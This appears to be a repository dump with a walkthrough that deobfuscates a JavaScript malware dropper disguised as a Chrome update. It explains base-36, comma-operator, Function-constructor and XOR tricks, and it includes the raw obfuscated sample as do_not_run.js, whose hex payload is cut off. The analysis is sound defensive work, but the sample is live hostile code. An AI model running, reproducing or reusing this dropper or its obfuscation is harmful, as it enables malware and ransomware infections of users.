JavaScript object. Every object in JavaScript contains this method. When ```toString()``` is called on primitives, like 0 in this case, this primitive value is converted into object (of type Number), then toString() is called on this object and finally new primitive (string) is returned.\n\nWhen ```toString()``` is called on Number object, additional argument can be passed. This argument is an integer between 2 and 36 specifying the base to use for representing numeric values. So, if ```toString(36)``` is called, argument represents base 36 - Hexatrigesimal system with digits represented by numbers 0-9 and letters a-z. Why it's important we'll see in further steps. Now, \nbecause 0 in any system is still 0, ```(0).toString(36)``` returns... 0.\n\n* second call, ```parseInt(0)``` returns 0 as well. ```parseInt()``` is a function which parses any passed string into Integer and returns it or, if such conversion is not possible, returns ```NaN``` (which is JavaScript representation of ```Not a Number``` value). In this case, it's just 0 parsed to Integer - results in 0 itself.\n\nFinally, ```parseInt((0).toString(36))``` is just a way to represent 0. But did you notice how many operations has to be done? This is what code obfuscation in JavaScript is all about - to make code as complicated as it's possible even if all we need is just 0.\n\nLet's also rename ```segovmiw4``` into ```i```, which is popular name for iterator variable inside ```for``` loops.\n\nSo after our first analysis, our code becomes:\n\n```javascript\nfunction cicuza(syhri) {\n        var result = [];\n        for (var i = 0; i < syhri[\"l\" + (\"F\", \"T\", \"H\", \"e\") + \"n\" + (\"G\", \"n\", \"O\", \"g\") + (29).toString(36) + (\"u\", \"X\", \"U\", \"p\", \"h\")]; i += parseInt((2).toString(36))) {\n            result[(\"E\", \"w\", \"f\", \"F\", \"p\") + (\"G\", \"i\", \"L\", \"u\") + \"s\" + \"h\"](parseInt(syhri[\"s\" + \"u\" + \"b\" + \"s\" + (\"M\", \"h\", \"M\", \"U\", \"f\", \"t\") + (\"M\", \"q\", \"r\")](i, (85, 19, 84, 9, 2)), parseInt((42).toString(0x24)) /*uShFAoMcgqPvcds6w2xD*/ ));\n        }\n        return result;\n    };\n\n```\n\n---\n\nNumber.toString() documentation\n\nhttp://devdocs.io/javascript/global_objects/number/tostring\n\nHexatrigesimal system converter\n\nhttp://www.calculand.com/unit-converter/zahlen.php?zs=36\n\n---\n\nNow, let's focus on what's exactly going on in this piece of code:\n\n```javascript\ni < syhri[\"l\" + (\"F\", \"T\", \"H\", \"e\") + \"n\" + (\"G\", \"n\", \"O\", \"g\") + (29).toString(36) + (\"u\", \"X\", \"U\", \"p\", \"h\")];\n```\n\nWe know that ```syhri``` is string. As we know, we can read strings using indexes like in ```Array``` type. ```String[0]``` means first character of the string, ```String[1]``` second character and so on.\nString has also a property ```length```, which represents its length in bytes.\n\nBut, what's this strange ```(\"F\", \"T\", \"H\", \"e\")``` construction means? Figure it out:\n\n* as I mentioned earlier, everything inside () is an expression. ```(\"F\")``` is an expressions which value is char \"F\":\n\n![Expression](assets/f.png)\n\n* comma operator ```,``` separates values and only __the last one__ is used. Consider this example:\n\n![Comma](assets/comma.png)\n\nNow, combine those two things together:\n\n![Expression](assets/expr.png)\n\nWhat was assigned to ```value``` was the last char (comma operator) returned from () expression.\n\nBack to our malware, we can read four first chars inside ```i < syhri[...]``` which are: ```l```, ```e```, ```n``` and ```g```. \nFifth one is again construction explained earlier, but this time, ```toString(36)``` is called on Number 29 - so ```(29).toString(36)``` returns 29th cipher in Hexatrigesimal system, which is ```t```. Last one expression returns ```h``` and finally, after concatenation with ```+``` operator - we can found ```syhri[\"length\"]``` as a result.\n\nAlso we can rename ```syhri``` into something friendly, like ```val``` and deobfuscate last part of ```for``` loop - ```parseInt((2).toString(36))``` is just 2.\n\nGreat, what we've got so far then?\n\n```javascript\nfunction cicuza(val) {\n        var result = [];\n        for (var i = 0; i < val[\"length\"]; i += 2) {\n            result[(\"E\", \"w\", \"f\", \"F\", \"p\") + (\"G\", \"i\", \"L\", \"u\") + \"s\" + \"h\"](parseInt(val[\"s\" + \"u\" + \"b\" + \"s\" + (\"M\", \"h\", \"M\", \"U\", \"f\", \"t\") + (\"M\", \"q\", \"r\")](i, (85, 19, 84, 9, 2)), parseInt((42).toString(0x24)) /*uShFAoMcgqPvcds6w2xD*/ ));\n        }\n        return result;\n    };\n\n```\n\nWe simplify the whole ```for```. Now, it's time to do the same with the expression inside the loop.\n \nUsing the same methods, we find ```result[(\"E\", \"w\", \"f\", \"F\", \"p\") + (\"G\", \"i\", \"L\", \"u\") + \"s\" + \"h\"]``` is equal to ```result[\"push\"]```. What's that mean?\n\nAs we know, in JavaScript we can call any Object property, like methods, using a dot notation. For example, if we have an array named ```arr```, we can call its ```push()``` method using ```.```:\n\n```javascript\nlet arr = [] // declare Array object named arr\narr.push(10) // adds 10 as a first element of Array arr\narr.push(20) // adds 20 as a second element\nconsole.log(arr) // prints [10, 20]\n```\n\nBut, we can also call __any__ method or Object property using ```[]``` operator. In this case, ```Object[\"propertyName\"]``` is the same as ```Object.propertyName``` The code above can be simply rewrite into this one:\n\n```javascript\nlet arr = []    // declare Array object named arr\narr[\"push\"](10) // adds 10 as a first element of Array arr\narr[\"push\"](20) // adds 20 as a second element\nconsole.log(arr) // prints [10, 20]\n```\n\nSo ```result[\"push\"]``` adds value to ```result``` array. And this value comes from following expression:\n\n```\nparseInt(val[\"s\" + \"u\" + \"b\" + \"s\" + (\"M\", \"h\", \"M\", \"U\", \"f\", \"t\") + (\"M\", \"q\", \"r\")](i, (85, 19, 84, 9, 2)), parseInt((42).toString(0x24)) /*uShFAoMcgqPvcds6w2xD*/ )\n```\nFragment ```[\"s\" + \"u\" + \"b\" + \"s\" + (\"M\", \"h\", \"M\", \"U\", \"f\", \"t\") + (\"M\", \"q\", \"r\")]``` returns name of ```substr``` function - one of the String object method which just returns part of the string. ```substr()``` accepts one or two arguments: first one is the index of first char of returned part and second one (optional) is a length of this part. If second argument is not passed, ```substr``` returns everything starting from position passed as first (and only) argument.\n\nConsider examples:\n\n```javascript\nlet s = \"Malware\"\nconsole.log(s.substr(0,2))   // Ma\nconsole.log(s.substr(2,4))   // lwar\nconsole.log(s.substr(3))     // ware\n\n```\n\nSo far, we get:\n\n```javascript\nparseInt(val[\"substr\"](i, (85, 19, 84, 9, 2)), parseInt((42).toString(0x24)) /*uShFAoMcgqPvcds6w2xD*/ )\n```\n\nWe can see that in this case two arguments are passed to ```val[\"substr\"]``` and they are ```i``` which is ```for``` loop current iterator value and 2 (result of expression ```(85, 19, 84, 9, 2)```:\n\n```\nval[\"substr\"](i, 2)\n```\n\nLast part is ```parseInt((42).toString(0x24))```. As we know, it parses 42 into Integer using ```0x24``` base. ```0x24``` is a hexadecimal value equals decimal 36. So finally we get 42 converted into String using Hexatrigesimal system:\n\n![42](assets/42.png)\n\nHow it works? in Hexatrigesimal system we have 36 ciphers and ```35``` decimal is equal to ```z``` in hexatrigesimal. 36 becomes 10, 37 becomes 11, 38 becomes 12 and so on, so 42 becomes 16. As result of ```parseInt((42).toString(0x24))``` is simply ```parseInt(16)``` - finally we get just 16 (because ```parseInt(16)``` equals 16 itself)\n\nThis is our deobfuscated ```cicuza()``` function (notice I've changed ```[]``` method calls into ```.``` notation):\n\n```javascript\n\n    function cicuza(val) {\n        var result = [];\n        for (var i = 0; i < val.length; i += 2) {\n            result.push(parseInt(val.substr(i, 2), 16));\n        }\n        return result;\n    };\n\n\n```\n\nNow we can see what this function actually does.\nAs ```val``` contains initial very, very long string passed as an argument to malware's top level IIFE, ```cicuza()``` iterates over it, substract every two characters, converts them from hexadecimal value into decimal one and finally pushes as an element of ```result``` array.\n\nSo as example - taking the first part of that very long string, which is ```\"41553a304f0b442551284206\"``` - 41 becomes 65, 55 becomes 85, 3a becomes 58, 30 becomes 48, 4f becomes 79 and so on. In the end, we end up with big array contains decimal values. And this array becomes as a value of ```defiq``` in our malware:\n\n\n```javascript\n(...)\n\tvar defiq = cicuza(quhuvu6);   // here we are so far :)\n    var permy = \"H@D~7a84O\";\n    var paghimqycgi = {\n        getpy: \"myqniroqa3\"\n    };\n        \n    (...)\n```\n\n\n---\n\nsubstr() documentation\n\nhttp://devdocs.io/javascript/global_objects/string/substr\n\n---\n\n\n## Getting function constructor\n\nVery common method in obfuscation of JavaScript malware is to hide any function definitions and calls. Why? Take a look at this code:\n\n```javascript\nfunction doubleX(x) {\n\treturn x * 2\n}\n\ndoubleX(10) // returns 20\n```\n\nIt's obvious what this code does. This is not something what can be considered as sophisticated piece of malware code rather...\n\nLet's try to obfuscate it a little:\n\n```javascript\nlet xcf = new Function(\"x\",\"return x * 2\")\n\nxcf(10)   // returns 20 as well\n```\n\nHow it works?\n\n```Function``` is a special method in JavaScript, which constructs new function (it works as function constructor). As arguments it accepts list of arguments for function which should be returned and, as last argument - body of this created function.\n\nSo in our example with ```xcf``` - first argument passed into ```Function()``` is an argument for ```xcf```, and second one is body of ```xcf```. Finally, we get function works in the same way as ```doubleX()```.\n\nBefore we'll proceed, one important thing to mention here: __every__ function in JavaScript has a property named __constructor__, which in fact is a ```Function()``` itself:\n\n\n![Function constructor](assets/function.png)\n\nWe've declared an array object. Then, we check that ```a.forEach``` method has its own property called ```constructor``` - and it is ```Function()```.\n\nWhy do we need this?\n\nBecause now, to define ```xcf()``` function, instead of calling ```new Function()``` you can do something like this:\n\n```javascript\nlet xcf = a.forEach.constructor(\"x\",\"return x * 2\")\n\nxcf(10)  // yep, it works! 20\n```\n\nCan you see advantages of this? Malware can hide declarations of any function, under any name and static code analysis tools can't find any explicit function declarations! \n\nVery similar method can be used to assign built-in methods to totally randomly named variables:\n:\n\n```javascript\nlet sdfgfdg = \"\".substr\nsdfgfdg.call(\"malware\",1,2)   // \"al\"\n```\n\n```call()``` is a way to run our function. Consider following example:\n\n```javascript\n\"malware\".substr(1,2)  // \"al\"\n```\nWe call ```substr``` method on ```\"malware\"``` string. But we can also __call__ function ```sdfgfdg```, which we assign ```String.substr()```, passing a string ```\"malware\"``` as an object on which our ```sdfgfdg``` has to be executed and also pass actual arguments.\n\n---\n\n```call()``` and ```apply()```, as well as ```bind()``` are quite advanced concepts in JavaScript. I strongly recommend to read about them in fantastic \"You Don't Know JS\" series by @getify (Kyle Simpson):\n\nhttps://github.com/getify/You-Dont-Know-JS\n\n---\n\n\nLast problem for malware is to hide explicit ```constructor``` call.\n\nOur malware does it as follows:\n\n```javascript\nvar xewubdiwhit = \"kydka\"[(12).toString(36) + (24).toString(36) + (\"r\", \"w\", \"h\", \"Z\", \"n\") + (\"n\", \"X\", \"L\", \"s\", \"w\", \"s\") + \"t\" + (27).toString(36) + \"u\" + \"c\" + (\"d\", \"m\", \"b\", \"t\") + (\"z\", \"E\", \"z\", \"n\", \"o\") + (\"N\", \"J\", \"r\")];\n```\n\nAs ```\"kydka\"``` is a string, it has, as every object in JavaScript, method ```constructor``` - and word ```constructor``` is build using already known method with converting numbers to strings with hexatrigesimal system, () expressions returned last element from comma-separated list of characters and finally concatenates them using ```+``` (for string it means concatenation) operator:\n\n```javascript\nvar xewubdiwhit = \"kydka\"[\"constructor\"]\n```\n\nNow, when we know what it does, let's refactor code above into something more readable:\n\n```javascript\nvar fnConstructor = String.constructor\n```\n\n\nNow, first lines of our deobfuscated malware are:\n\n```javascript\n(function(quhuvu6) {\n    var defiq = cicuza(quhuvu6);\n    var permy = \"H@D~7a84O\";\n    var paghimqycgi = {\n        getpy: \"myqniroqa3\"\n    };\n    var fnConstructor = String.constructor;\n    var tyttaluli = \"mokzine\";\n\n    var dikol = [];\n    var mirjokbynet = 1;  // (27, 50, 52, 21, 1) equals 1\n    \n    (...)\n\n```\n\n---\n\nMore on functions ```call()``` and ```apply()```\n\nhttp://devdocs.io/javascript/global_objects/function/call\n\nhttp://devdocs.io/javascript/global_objects/function/apply\n\n---\n\n\n## Logical operators tips and tricks\n\nIn our analysis we get into this fragment:\n\n```javascript\n\n    while (mirjokbynet <= permy[(\"h\", \"g\", \"B\", \"W\", \"l\") + \"e\" + (23).toString(0x24) + \"g\" + (\"u\", \"Z\", \"W\", \"u\", \"t\") + (17).toString(36)]) {\n        dikol = (permy[(\"M\", \"H\", \"s\") + (\"C\", \"N\", \"D\", \"u\") + (11).toString(0x24) + (28).toString(0x24) + (\"T\", \"k\", \"t\") + \"r\"](permy[(21).toString(0x24) + \"e\" + \"n\" + (16).toString(36) + (\"L\", \"S\", \"x\", \"t\") + (\"I\", \"D\", \"h\") /*Q5E278CBpoixvOtUNpix*/ ] - mirjokbynet))[(\"d\", \"R\", \"p\", \"s\") + (\"H\", \"K\", \"A\", \"s\", \"D\", \"p\") + \"l\" + \"i\" + (\"Y\", \"b\", \"h\", \"t\") /*O7MOfVrRkP9RlXlfKLxi*/ ]('');\n        for (var juqno = +!!false; juqno < defiq[(\"R\", \"t\", \"E\", \"l\") + (\"y\", \"e\", \"f\", \"R\", \"e\") + (23).toString(36) + (16).toString(36) + \"t\" + \"h\" /*H3RMPYzEeu55OVeGgb1v*/ ]; juqno++) {\n            defiq[juqno] = defiq[juqno] ^ dikol[juqno % dikol[\"l\" + (14).toString(36) + \"n\" + (16).toString(0x24) + (29).toString(0x24) + (\"X\", \"O\", \"c\", \"m\", \"h\")]][\"c\" + (\"G\", \"w\", \"R\", \"e\", \"h\") + (10).toString(36) + (\"A\", \"W\", \"V\", \"i\", \"r\") + \"C\" + (\"Z\", \"O\", \"W\", \"o\") + (\"R\", \"N\", \"A\", \"y\", \"d\") + \"e\" + \"A\" + \"t\" /*YZz3OuivKuwgqjkFVKu0*/ ]((88, 53, 3, 90, 0));\n        }\n        mirjokbynet++;\n    };\n```\n\nApart of methods we discussed so far, we can spot here couple of strange logical operators usages.\n\nFirst, let's simplify the code and deobfuscate all we can using already know techniques. I've renamed ```mirjokbynet``` into ```k``` and ```juqno``` into ```j``` as well:\n\n```javascript\n\n    while (k <= permy.length) {\n        dikol = (permy.substr(permy.length - k)).split('');\n        for (var j = +!!false; j < defiq.length; j++) {\n            defiq[j] = defiq[j] ^ dikol[j % dikol.length].charCodeAt(0);\n        }\n        k++;\n    };\n```\n\nThis looks better. \n\nNow, we can follow code execution in this fragment of malware. As we can see, in ```while``` condition variable named ```permy``` is used and its definition assign ```\"H@D~7a84O\"``` string as its value.\n\nIt's time to figure out how this fragment works:\n\n```javascript\n while (k <= 9) {   // 9 is value of permy.length\n```\nNext line defines value for array ```dikol```:\n\n```javascript\ndikol = (permy.substr(permy.length - k)).split('');\n```\nAs in this place value of ```k``` equals 0, ```dikol``` becomes the last element of ```permy``` string (which is splitted into an array by ```split('')``` call), so its value in first ```while``` iteration becomes ```[0]```\n\nNow, the ```for``` part:\n\n```javascript\nfor (var j = +!!false; j < defiq.length; j++) {\n\tdefiq[j] = defiq[j] ^ dikol[j % dikol.length].charCodeAt(0);\n}\n```\nInto what value ```+!!false``` evaluates?\n\n* initialy, it is ```false```\n* then, first ```!```, which is logical NOT (negation) changes it into ```true```\n* and next ```!``` again changes it into ```false```\n* finally, ```+``` casts Boolean value ```false``` into Integer ```0``` (you can check this flow, step by step, in Chrome console):\n\n\n![False](assets/false.png)\n\n\nSo many efforts to get just one ```0```...\n\nNext, we have another logical operators inside ```for``` loop.\nAs we found, ```defiq``` is an array with decimal values (it's initial string passed into IIFE after couple of transformations we discovered earlier).\n\nWe will focus now on first element of ```defiq``` array, which is ```65```.\nThe result of expression ```defiq[j] ^ dikol[j % dikol.length].charCodeAt(0)``` is calculated in several steps:\n\n* ```j``` is actual loop control value. For first element it will be ```0```, so the result of ```j % dikol.length``` is ```0``` (```0 % 1 = 0```). Remember that ```dikol.length``` in this iteration equals 1.\n* now, we have expression ```defiq[j] ^ dikol[0].charCodeAt(0)``` which evaluates into ```65 ^ 79``` (```65``` is first element of ```defiq``` array and ```79``` is a result of ```dikol[0].charCodeAt(0)``` - ```dikol[0]``` equals ```O``` (capital o), and ```'O'.charCodeAt(0)``` equals 79\n* operator ```^``` is bitwise operator XOR (eXclusive OR). The result of expression ```65 ^ 79``` is ```14```.\n\nNext, ```k++``` increments value of ```k``` and the whole operation starts again. This loop lasts as long as whole ```defiq``` array is transformed into new values.\n\n---\n\n__Logical and bitwise operators__\n\n```! (logical NOT)```\n\nhttp://devdocs.io/javascript/operators/logical_operators#Logical_NOT\n\n```^ (bitwise XOR)```\n\nhttp://devdocs.io/javascript/operators/bitwise_operators#Bitwise_XOR\n\nhttps://en.wikipedia.org/wiki/Bitwise_operation#XOR\n\n---\n\n\n\n## Almost done!\n\nLast fragment of malware should be easy to deobfuscate with all tricks we've learnt:\n\n```javascript\n\n    for (var vaxofibcid = +!!false; vaxofibcid < defiq[(21).toString(0x24) + (14).toString(0x24) + (\"o\", \"w\", \"n\") + \"g\" + (\"W\", \"w\", \"v\", \"K\", \"t\", \"t\") + (17).toString(36)]; vaxofibcid++) {\n        defiq[vaxofibcid] = \"ms\" [\"c\" + \"o\" + (\"T\", \"L\", \"w\", \"T\", \"n\") + (\"p\", \"z\", \"K\", \"O\", \"P\", \"s\") + (29).toString(0x24) + (\"k\", \"B\", \"o\", \"L\", \"P\", \"r\") + (\"K\", \"b\", \"g\", \"t\", \"u\") + (12).toString(36) + (\"Y\", \"U\", \"T\", \"t\") + (24).toString(0x24) + (\"Y\", \"i\", \"r\")][(\"p\", \"V\", \"E\", \"L\", \"G\", \"f\") + \"r\" + (\"X\", \"X\", \"o\") + \"m\" + (\"d\", \"R\", \"J\", \"A\", \"C\") + \"h\" + (10).toString(0x24) + (27).toString(0x24) + (12).toString(0x24).toUpperCase() + \"o\" + (\"K\", \"Y\", \"a\", \"v\", \"N\", \"d\") + (14).toString(36) /*PBi4j6Mle9j71igjdR2P*/ ](defiq[vaxofibcid]);\n    };\n\n\n    tyttaluli = defiq[(\"Q\", \"Z\", \"U\", \"j\") + (\"H\", \"J\", \"o\") + (18).toString(36) + (\"v\", \"s\", \"I\", \"v\", \"N\", \"n\") /*vdmIiGO523flagErARiC*/ ]('');\n    paghimqycgi[\"t\" + (\"J\", \"g\", \"G\", \"o\") + \"S\" + (29).toString(36) + (\"E\", \"N\", \"p\", \"r\") + \"i\" + (23).toString(36) + (\"a\", \"g\", \"X\", \"v\", \"g\") /*UnDf5WWU1YYgk8xYA8QT*/ ] = fnConstructor[(12).toString(36) + \"o\" + (\"N\", \"B\", \"a\", \"u\", \"g\", \"n\") + (28).toString(36) + \"t\" + \"r\" + \"u\" + (12).toString(0x24) + (29).toString(0x24) + (\"O\", \"J\", \"g\", \"V\", \"H\", \"o\") + (27).toString(0x24)](tyttaluli);\n \tvar gogoq = \"1cf4d5\" + paghimqycgi + \"631a403f5\";\n\n```\n\nbecomes\n\n```javascript\n\nfor (var r = +!!false; r < defiq.length; r++) {\n    defiq[r] = String.fromCharCode(defiq[r]);\n};\n\n\nt = defiq.join('');\nv.toString = fnConstructor.constructor(t);\nvar gogoq = \"1cf4d5\" + v + \"631a403f5\";\n\n```\n\nThe only purpose of all this code is to perform manipulation of an array, to finally get a string passed to ```nilse``` function:\n\n```javascript\n\n    nilse(gogoq);\n\n\n    function cicuza(val) {\n        (...)\n    };\n\n\n\n    function nilse(tefkysab) {\n        return (new Function()(tefkysab));\n    };\n    \n```\n\nAnd that's pretty all. Our deobfuscated malware sample looks now much more readable but it still can be quite hard to run it and make it works (I found that there's some error which does not allow to finish last transformation):\n\n```javascript\n(function(quhuvu6) {\n    var defiq = cicuza(quhuvu6);\n    var permy = \"H@D~7a84O\";\n    var v = {\n        getpy: \"myqniroqa3\"\n    };\n    var fnConstructor = String.constructor;\n    var t = \"mokzine\";\n\n    var dikol = [];\n    var k = 1;\n\n    while (k <= permy.length) {\n        dikol = (permy.substr(permy.length - k)).split('');\n        for (var j = +!!false; j < defiq.length; j++) {\n            defiq[j] = defiq[j] ^ dikol[j % dikol.length].charCodeAt(0);\n        }\n        k++;\n    };\n\n    for (var r = +!!false; r < defiq.length; r++) {\n        defiq[r] = String.fromCharCode(defiq[r]);\n    };\n\n\n    t = defiq.join('');\n    v.toString = fnConstructor.constructor(t);\n    var gogoq = \"1cf4d5\" + v + \"631a403f5\";\n\n    nilse(gogoq);\n\n\n    function cicuza(val) {\n        var result = [];\n        for (var i = 0; i < val.length; i += 2) {\n            result.push(parseInt(val.substr(i, 2), 16));\n        }\n        return result;\n    };\n\n    function nilse(tefkysab) {\n        return (new Function()(tefkysab));\n    };\n}(\"41553a304f0b442(......)  // string cut for readability\n``` \n\n\n## Summary\n\nMethods presented in this post are quite simple and based on  JavaScript language syntax. Although they were found in real life code (infection vector was fake Chrome update - as I mentioned at the beginning of this post, the code has not been run thanks to Windows setting showing file extension and my colleague spots that this is not update installer but JS file and did not run it)\n\nMain intention of this file was to trick anyone who download this code to click it. After all transformation we followed, the final version of this code becomes Windows Script Host (WSH) file which can for example download and run real malware or ransomware.\n\nIf you are curious how it will be possible, you can take a look at my previous post, where I'm going through RAA ransomware, popular JavaScript ransomware with CryptoJS build-in library and Locky malware  dropper:\n\nhttps://github.com/bl4de/research/blob/master/raa-ransomware-analysis/README.md\n\n---\n\n__Windows Script Host__\n\nhttps://en.wikipedia.org/wiki/Windows\\_Script\\_Host\n\n---\n\n\n## Comments? Thoughts? Questions?\n\nIf you have any questions or doubts - feel free to contact me:\n\n- Twitter: https://twitter.com/_bl4de\n- email: bloorq   .(o,o)/   gmail.com\n\nThank you for reading!\n\nBest Regards,\n\n"
  },
  {
    "path": "javascript-malware-obfuscation/do_not_run.js",
    "content": "(function (quhuvu6) {\n    var defiq = cicuza(quhuvu6);\n    var permy = \"H@D~7a84O\";\n    var paghimqycgi = {\n        getpy: \"myqniroqa3\"\n    };\n    var xewubdiwhit = \"kydka\"[(12).toString(36) + (24).toString(36) + (\"r\", \"w\", \"h\", \"Z\", \"n\") + (\"n\", \"X\", \"L\", \"s\", \"w\", \"s\") + \"t\" + (27).toString(36) + \"u\" + \"c\" + (\"d\", \"m\", \"b\", \"t\") + (\"z\", \"E\", \"z\", \"n\", \"o\") + (\"N\", \"J\", \"r\")];\n    var tyttaluli = \"mokzine\";\n\n    var dikol = [];\n    var mirjokbynet = (27, 50, 52, 21, 1);\n\n    while (mirjokbynet <= permy[(\"h\", \"g\", \"B\", \"W\", \"l\") + \"e\" + (23).toString(0x24) + \"g\" + (\"u\", \"Z\", \"W\", \"u\", \"t\") + (17).toString(36)]) {\n        dikol = (permy[(\"M\", \"H\", \"s\") + (\"C\", \"N\", \"D\", \"u\") + (11).toString(0x24) + (28).toString(0x24) + (\"T\", \"k\", \"t\") + \"r\"](permy[(21).toString(0x24) + \"e\" + \"n\" + (16).toString(36) + (\"L\", \"S\", \"x\", \"t\") + (\"I\", \"D\", \"h\") /*Q5E278CBpoixvOtUNpix*/] - mirjokbynet))[(\"d\", \"R\", \"p\", \"s\") + (\"H\", \"K\", \"A\", \"s\", \"D\", \"p\") + \"l\" + \"i\" + (\"Y\", \"b\", \"h\", \"t\") /*O7MOfVrRkP9RlXlfKLxi*/]('');\n        for (var juqno = +!!false; juqno < defiq[(\"R\", \"t\", \"E\", \"l\") + (\"y\", \"e\", \"f\", \"R\", \"e\") + (23).toString(36) + (16).toString(36) + \"t\" + \"h\" /*H3RMPYzEeu55OVeGgb1v*/]; juqno++) {\n            defiq[juqno] = defiq[juqno] ^ dikol[juqno % dikol[\"l\" + (14).toString(36) + \"n\" + (16).toString(0x24) + (29).toString(0x24) + (\"X\", \"O\", \"c\", \"m\", \"h\")]][\"c\" + (\"G\", \"w\", \"R\", \"e\", \"h\") + (10).toString(36) + (\"A\", \"W\", \"V\", \"i\", \"r\") + \"C\" + (\"Z\", \"O\", \"W\", \"o\") + (\"R\", \"N\", \"A\", \"y\", \"d\") + \"e\" + \"A\" + \"t\" /*YZz3OuivKuwgqjkFVKu0*/]((88, 53, 3, 90, 0));\n        }\n        mirjokbynet++;\n    };\n\n    for (var vaxofibcid = +!!false; vaxofibcid < defiq[(21).toString(0x24) + (14).toString(0x24) + (\"o\", \"w\", \"n\") + \"g\" + (\"W\", \"w\", \"v\", \"K\", \"t\", \"t\") + (17).toString(36)]; vaxofibcid++) {\n        defiq[vaxofibcid] = \"ms\"[\"c\" + \"o\" + (\"T\", \"L\", \"w\", \"T\", \"n\") + (\"p\", \"z\", \"K\", \"O\", \"P\", \"s\") + (29).toString(0x24) + (\"k\", \"B\", \"o\", \"L\", \"P\", \"r\") + (\"K\", \"b\", \"g\", \"t\", \"u\") + (12).toString(36) + (\"Y\", \"U\", \"T\", \"t\") + (24).toString(0x24) + (\"Y\", \"i\", \"r\")][(\"p\", \"V\", \"E\", \"L\", \"G\", \"f\") + \"r\" + (\"X\", \"X\", \"o\") + \"m\" + (\"d\", \"R\", \"J\", \"A\", \"C\") + \"h\" + (10).toString(0x24) + (27).toString(0x24) + (12).toString(0x24).toUpperCase() + \"o\" + (\"K\", \"Y\", \"a\", \"v\", \"N\", \"d\") + (14).toString(36) /*PBi4j6Mle9j71igjdR2P*/](defiq[vaxofibcid]);\n    };\n\n\n    tyttaluli = defiq[(\"Q\", \"Z\", \"U\", \"j\") + (\"H\", \"J\", \"o\") + (18).toString(36) + (\"v\", \"s\", \"I\", \"v\", \"N\", \"n\") /*vdmIiGO523flagErARiC*/]('');\n    paghimqycgi[\"t\" + (\"J\", \"g\", \"G\", \"o\") + \"S\" + (29).toString(36) + (\"E\", \"N\", \"p\", \"r\") + \"i\" + (23).toString(36) + (\"a\", \"g\", \"X\", \"v\", \"g\") /*UnDf5WWU1YYgk8xYA8QT*/] = xewubdiwhit[(12).toString(36) + \"o\" + (\"N\", \"B\", \"a\", \"u\", \"g\", \"n\") + (28).toString(36) + \"t\" + \"r\" + \"u\" + (12).toString(0x24) + (29).toString(0x24) + (\"O\", \"J\", \"g\", \"V\", \"H\", \"o\") + (27).toString(0x24)](tyttaluli);\n    var gogoq = \"1cf4d5\" + paghimqycgi + \"631a403f5\";\n\n    nilse(gogoq);\n\n\n    function cicuza(syhri) {\n        var fahomyfo = [];\n        for (var segovmiw4 = parseInt((0).toString(36)) /*CN1b367Z19XZqi8XgI67*/; segovmiw4 < syhri[\"l\" + (\"F\", \"T\", \"H\", \"e\") + \"n\" + (\"G\", \"n\", \"O\", \"g\") + (29).toString(36) + (\"u\", \"X\", \"U\", \"p\", \"h\")]; segovmiw4 += parseInt((2).toString(36))) {\n            fahomyfo[(\"E\", \"w\", \"f\", \"F\", \"p\") + (\"G\", \"i\", \"L\", \"u\") + \"s\" + \"h\"](parseInt(syhri[\"s\" + \"u\" + \"b\" + \"s\" + (\"M\", \"h\", \"M\", \"U\", \"f\", \"t\") + (\"M\", \"q\", \"r\")](segovmiw4, (85, 19, 84, 9, 2)), parseInt((42).toString(0x24)) /*uShFAoMcgqPvcds6w2xD*/));\n        }\n        return fahomyfo;\n    };\n\n\n\n    function nilse(tefkysab) {\n        return (new Function()(tefkysab));\n    };\n}(\"41553a304f0b442551284206\" + \"672651014d1e1a60127\" + \"b2a146b3625332202274\" + \"17121712e033c64344e117735272b512a500b5c6034782e4d743625546f000c5\" + \"a4e183\" + \"46c166d6802293f5a7d3a55296d561b1c35680f03131b24356b3f070303\" + \"510100237e2b2e03780474091516297067364539282132\" + \"2d44\" + \"3e1a6c1646096d6a495a1b1c2a656a214e683e675d35724c440d152624734c72391521602a6b096f595b0349106b36251b22564e647e6728260516141a4f0f353d773141241368\" + \"5464381848\" + \"641f2c5e02343b160c3a3e\" + \"7b4a5a21540040395a7e315c7f095b0b7a5f1c45392e3e3d42497a5f2b795370196b7265615e1e41214624227f681b084\" + \"674462b7323426a4f732c54221809266549417877177231114671397e1b4341707f651c103835741b0\" + \"c0f6743741442321c576c43171b144c317278043d7731360716136374261325363b396109034f13775f55367b70136f637c7264401a3e35505e6d49096c6d742d642c6513250f456f646\" + \"c72427e4e492b2c2a2c5e6e19494f17092f7c\" + \"027d512c46410c390b07\" + \"043179291842696d415b51376f50132d7c766a4a5413637c1f1b44510839392b786602222a403918715856514f00172e6c224b5a7\" + \"c1223685031633157041f434d3037424\" + \"72e307c707e04471d354e\" + \"0b1f3d655f162604630d22576c460c5d13570235063143784\" + \"23e042d3b29680e675d0a7f117e3432\" + \"4e3c7d08\" + \"4\" + \"83336250f031c3e7b346f4c4271685c6f66233f38345e\" + \"1c686b46427471413925223c1a286320296e0\" + \"a0c\" + \"714635217d2e4e2236266907341951263a596c1b196b115f61502a5\" + \"e4806773078341c6f5a1b3132624d1935251\" + \"9462a1b67247b714137\" + \"55014721234d02166d3d2a5e2551\" + \"6944393f413814731702513b792d0a6b527b16786b4c7\" + \"80b7b2246144\" + \"e172e451479296d3b3\" + \"44b4354577e77690830674d6f49145b075b35770449692d42755e6273000f420371662f6d743a7064636c701\" + \"317225747753d38424\" + \"c260e0866134c71725e6\" + \"94a4a0b3e32\" + \"3459533a68731c7d6f28217f1b183e723e64311068545046235a645f682f33105168177f1b3b57034c2d4570037f6351285d1f6a1c48293b62077e704e0b55756510415a361c6d04425a560d325a0f522f3a1a36704e344f4f255d7b1f5e397f3b523\" + \"063220b7f512b7b025a5823065c7422786e5a25173a7c7b6c0\" + \"e5566095d36775857511d6f611b432420717524196e77057d7b1310033a182059757f68037\" + \"407\" + \"2e613d6d\" + \"2a\" + \"76223d6b1b3f323500411f4c0330670378082573367e514b370e25\" + \"24511a6f622f433e415a354e547f255d7f7\" + \"4102c4\" + \"d7552150626595957091e5d0477182a0f6d434\" + \"15e503d6d383d2141415705341e3e4142681c09683e290b360e423f1c3d6e054f091d2c60702d132537515c49322e6e21017306460a4a576d4f1125596a257421683a7613242f36691f097e59633\" + \"5206c651e5861596e7b016a42696b36683e421d3d4a4536103746043c\" + \"467b3b6c30586\" + \"d3b17015f4c1f055e150464102e49674d285a130159\" + \"043d080e140917571a704d6837186a15692e325e515a39305d09661f2a7c0b1732616b1664045c234d296d6f493a07730225224d6d2d4b1b40237c\" + \"515b310a6a494178732d2b7757684c641964275e1b2c343240734e2d\" + \"461409555\" + \"07c134a643b033\" + 